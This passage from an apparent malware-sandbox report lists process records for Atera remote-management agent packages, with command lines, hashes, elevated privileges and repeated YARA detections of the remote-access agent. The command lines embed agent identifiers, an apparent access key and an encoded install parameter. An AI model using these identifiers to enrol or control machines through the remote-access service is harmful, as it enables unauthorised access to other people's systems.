                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                        Imagebase:0x7ff6be5f0000
                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:11:19:48
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:11:19:48
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x246babe0000
                                                                                                                                                                                                                                        File size:177'712 bytes
                                                                                                                                                                                                                                        MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1871410014.00000246D408C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1869079439.00000246D3EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1876075964.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB82C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1850146314.00000246BACDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1857899782.00000246BAFB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB7D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:11:19:48
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:11:19:50
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff71e3c0000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:11:19:50
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x27054f00000
                                                                                                                                                                                                                                        File size:74'288 bytes
                                                                                                                                                                                                                                        MD5 hash:749C51599FBF82422791E0DF1C1E841C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:11:19:50
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:11:19:50
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:11:19:50
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff6cc2d0000
                                                                                                                                                                                                                                        File size:161'280 bytes
                                                                                                                                                                                                                                        MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.1709494324.00000218AF010000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:11:19:51
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\sppsvc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sppsvc.exe
                                                                                                                                                                                                                                        Imagebase:0x7ff7c7fc0000
                                                                                                                                                                                                                                        File size:4'630'384 bytes
                                                                                                                                                                                                                                        MD5 hash:320823F03672CEB82CC3A169989ABD12
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                        Start time:11:19:55
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "8a9134ff-5e44-480a-9a18-d667aeeec188" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x22abff10000
                                                                                                                                                                                                                                        File size:396'336 bytes
                                                                                                                                                                                                                                        MD5 hash:B50005A1A62AFA85240D1F65165856EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                        Start time:11:19:55
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:11:20:03
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k smphost
                                                                                                                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                        Start time:11:20:20
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x1e4330e0000
                                                                                                                                                                                                                                        File size:177'712 bytes
                                                                                                                                                                                                                                        MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E433A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2149932355.000001E43325B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2275598448.000001E44C3EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E433AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                        Start time:11:20:20
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:11:20:20
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff71e3c0000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.2110035392.000001F140C40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000003.1934486823.000001F140E30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.2110707881.000001F140E10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.2110035392.000001F140C64000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.2110035392.000001F140C4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                        Start time:11:20:20
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:11:20:20
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff6cc2d0000
                                                                                                                                                                                                                                        File size:161'280 bytes
                                                                                                                                                                                                                                        MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2092308272.000001449A500000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:11:20:22
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x10b6e4b0000
                                                                                                                                                                                                                                        File size:55'344 bytes
                                                                                                                                                                                                                                        MD5 hash:D11B2139D29E79D795054C3866898B7F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                        Start time:11:20:22
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                        Start time:11:20:24
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
                                                                                                                                                                                                                                        Imagebase:0x2e7230a0000
                                                                                                                                                                                                                                        File size:55'344 bytes
                                                                                                                                                                                                                                        MD5 hash:D11B2139D29E79D795054C3866898B7F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2040710352.000002E72329F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2144565646.000002E723C83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2040710352.000002E723305000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2040710352.000002E723288000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2040710352.000002E723280000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2040710352.000002E7232BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2142200483.000002E723480000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2144565646.000002E723C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                        Start time:11:20:24
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                        Start time:11:20:25
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x24844c30000
                                                                                                                                                                                                                                        File size:33'328 bytes
                                                                                                                                                                                                                                        MD5 hash:B39264220D20A5C2807CDA3EA5F6B772
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2561414784.0000024844E21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2571688057.00000248459CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2571688057.000002484595F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2567716195.0000024845510000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2567179380.00000248450C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2561414784.0000024844DEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000000.1978260272.0000024844C32000.00000002.00000001.01000000.0000002A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2571688057.000002484567F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2571688057.000002484569A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2567716195.0000024845571000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2557866082.000000C469EF0000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
